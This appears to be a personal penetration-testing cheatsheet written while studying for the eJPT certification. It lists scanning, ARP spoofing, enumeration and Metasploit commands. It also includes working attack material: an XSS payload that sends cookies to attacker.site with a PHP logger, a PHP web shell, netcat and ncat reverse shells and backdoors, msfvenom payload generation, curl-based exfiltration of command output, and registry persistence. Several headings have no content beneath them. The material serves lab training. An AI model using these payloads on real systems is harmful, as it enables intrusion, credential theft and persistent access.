eJPT-notes

Note These are all the notes I took while following the INE course for eJPT certification, I strongly think everything you need to pass the exam is in this ‘cheatsheet’.

Notes by @edoardottt, exam passed with 19/20 score.

Info about eJPT certification here.
Read also my blog post about eJPT certification.

Exam setup

Add a route in IP routes

Linux:

ip route <destination network> via <gateway>

Show IP addresses

Linux:

ip addr

Show CAM table

Linux:

ip neighbor

or

ifconfig

Show Listening ports (both UDP and TCP)

Linux:

netstat -tunp

Windows:

netstat -ano

ARP Spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target> -r <host>

To intercept the traffic between 192.168.4.11 and 192.168.4.16

arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16

Ping sweeping

fping -a -g 192.168.1.0/24 2> /dev/null

or

fping -a -f targets.txt 2>/dev/null

or

nmap -sn 192.168.1.0/24

or

nmap -sn -iL networks.txt

OS Fingerprinting

nmap -Pn -O <target(s)>

Port Scanning

nmap…Then remember:

Example:

nmap -sS -p 1-100,443 192.168.1.13,14

Tip: Use --reason to show the explanation of why a port is marked open or closed
Tip: Use --open to show only open, open|filtered, and unfiltered ports.

TCP Quick Scan

nmap -sV -sC 192.168.1.1

TCP Full Scan

nmap -sV -sC -p- 192.168.1.1

UDP Quick Scan

nmap -sV -sU 192.168.1.1

Get info on a particular service

nmap -sC -p 27017 192.168.1.13 | less

Masscan

Check if masscan is properly installed:

masscan --regress

Scan example:

masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24

If you want to use a VPN connection (configure the options properly):

masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 -e tap0 --router-ip 192.168.1.1

In order to save the configuration into a file:

masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 --echo > masscan.conf

Use the configuration file as input:

masscan -c masscan.conf

Web Fingerprinting

Using netcat:

nc 192.168.1.2 80
HEAD / HTTP/1.1

Using openssl:

openssl s_client -connect target.site:443
HEAD / HTTP/1.1

Using httprint:

httprint -P0 -h 192.168.1.1 -s /usr/local/bin/signatures.txt

Directory/Files enumeration with dirb

Default scan:

dirb http://google.com

Using a custom wordlist:

dirb http://google.com /usr/share/dirb/wordlists/small.txt

Using cookies:

dirb http://google.com -c "COOKIE:XYZ"

Using Basic Authentication:

dirb http://google.com -u "admin:password"

Using Custom Header:

dirb http://google.com -H "MyHeader: MyContent"

Disable recursive enumeration:

dirb http://google.com -r

Set Speed delay in milliseconds:

dirb http://google.com -z 1000

Specify extensions:

dirb http://google.com -X ".php,.bak"

Save results in a file:

dirb http://google.com -o results.txt

Google Dorks

Example: -inurl:(htm|html|php|asp|jsp) intitle:"index of" "last modified" "parent directory" txt OR doc OR pdf
See also the Google Hacking Database

XSS

Payload: <script>var i = new Image(); i.src = "http://attacker.site/log.php?q+"+document.cookie;</script>
Server:

<?php
$filename="/tmp/log.txt";
$fp=fopen($filename, 'a');
$cookie=$_GET['q'];
fwrite($fp, $cookie);
fclose($fp);
?>

SQLi

Payloads:

Sqlmap:

Tip: Dump only the data you’re interested in, not the whole database. Dumping a lot of data using SQLi is very noisy and a heavy process.

Misconfigured PUT method

wc -m payload.php
20 payload.php
nc victim.site 80
PUT /payload.php HTTP/1.1
Host: victim.site
Content-type: text/html
Content-length: 20

<?php phpinfo(); ?>

Uploading PHP shell

<?php
if (isset($_GET['cmd']))
{
    $cmd = $_GET['cmd'];
    echo '<pre>';
    $result = shell_exec($cmd);
    echo $result;
    echo '</pre>';
}
?>

Authentication Cracking with Hydra

Authentication Cracking with nmap

Authentication Cracking with metasploit

Password cracking using John the Ripper

Cracking Password of Microsoft Word file using John the Ripper

Password cracking using Hashcat

Windows Shares

Interesting shares:

Enumerating shares (Windows):

Enumerating shares (Linux):

Metasploit

msfconsole
show -h
search <keyword(s)>
use <path-to-exploit>
show options
set <option-name> <option-value> 
exploit

Tip: Use show payloads when an exploit is selected to show only the available payloads for that exploit
Tip: Use info when an exploit is selected to get information about the exploit
Tip: Use back when an exploit is selected to return to unselect it

Meterpreter

Inside metasploit:

Tip: help shows an amazing list of available commands divided by category
Tip: If getsystem fails, use use exploit/windows/local/bypassuac
Tip: ps -U SYSTEM shows only the processes with SYSTEM privileges
Tip: Use post/windows/gather/hashdump to dump the passwords DB and save it for an offline cracking session

Pivoting with Meterpreter

Let’s say we have compromised a machine using metasploit and we have a meterpreter shell with session id 1. We discover that there is another machine but it’s reachable only from the compromised machine.
Our IP: 192.180.40.2
Compromised host: 192.180.40.3
Unreachable machine: 192.130.110.3

If we want to scan the 192.130.110.0/24 network we can use:

msf > use auxiliary/scanner/portscan/tcp
msf > set PORTS 80, 8080, 445, 21, 22, ...
msf > set RHOSTS 192.130.110.1-254
msf > exploit

If we discover that at least one port is open and we want to target a specific port on a specific host (e.g. 192.130.110.3:21) we can use:

Then if we want to scan the service we can use nmap:

msf > nmap -sS -sV -p 1234 localhost

Reverse shell with Netcat

Attacker:

nc -lvp 8888 -e /bin/bash

Target (the IP of the attacker):

nc -v 192.168.1.1 8888

Generate a reverse shell payload with msfvenom

msfvenom --list payloads | grep <keyword>
msfvenom -p php/reverse_php lhost=192.168.0.58 lport=443 -o reverse.php
msfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.0.58 lport=443 -f elf -o reverse443
chmod +x reverse443

Note: If you have generated a meterpreter payload shell, you have to use meterpreter in order to receive back the connection

Blind Remote Code Execution

Target (Use the Attacker IP)

curl http://192.168.1.130:53/`whoami`

or

curl http://192.168.1.130:53/`id | base64`

Attacker:

nc -lvp 53

Tip: You can also create a reverse shell with msfvenom and let the target download it

Enumerating users history with meterpreter

Data exfiltration with Netcat

Receiver:

nc -lvnp 8888 > received.txt

Sender (the IP of the receiver):

cat message.txt | nc -v 192.168.1.1 8888

Backdoor using ncat

Victim:

ncat -l -p 5555 -e cmd.exe

Attacker (the IP of the victim):

ncat 192.168.1.66 5555

Reverse Backdoor using ncat

Attacker:

ncat -l -p 5555 -v

Victim (the IP of the attacker):

ncat -e cmd.exe 192.168.1.66 5555

Tip: For persistent reverse backdoor use the registry key Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Reverse Backdoor using Metasploit

msfconsole
use exploit/windows/local/s4u_persistence
show options
sessions
set session <session-id>
set trigger logon
set payload windows/meterpreter/reverse_tcp
set lhost <local-ip>
set lport 1234
exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost <local-ip>
set lport 1234
exploit
sysinfo
ps
help

Tip: once we get a shell we can use screenshot to get a picture of what the victim is seeing on the Desktop
Tip: once we get a shell we can use download filename location to save the filename in the specified location on our machine
Tip: Same syntax as above but use upload to upload files
Tip: Use getsystem to gain the highest privilege (i.e. SYSTEM) on the compromised machine and getuid to check if it actually worked.

Upgrading a simple shell

bash -i
python -c 'import pty; pty.spawn("/bin/sh")'

Maintaining access using Metasploit (Windows)

Inside a meterpreter session:

Use the backdoor:

Note: The <session-id> is the one you can read when you type background
Note: We need to use the same information about the backdoor to receive a new meterpreter session on the multi-handler. We can’t change Payload, IP or Ports details.

Pivoting using a SOCKS Proxy

You have access to a compromised host and only from there you can access another machine. That machine exposes a web server, in order to access it from your computer set up a SOCKS proxy.

Add the route to the unreachable network using autoroute or route.

msf > use auxiliary/server/socks_proxy
msf > set VERSION 4a
msf > set SRVPORT 9050
msf > run -j
root@INE:~# proxychains nmap ...

Then you can also setup firefox in order to send request using the SOCKS proxy v4 at 127.0.0.1:9050.

Dump AutoLogin stored credentials

Inside a meterpreter session:


If you find an error or want to improve this page, just open an issue.

Don’t text/mail me looking for exam solutions.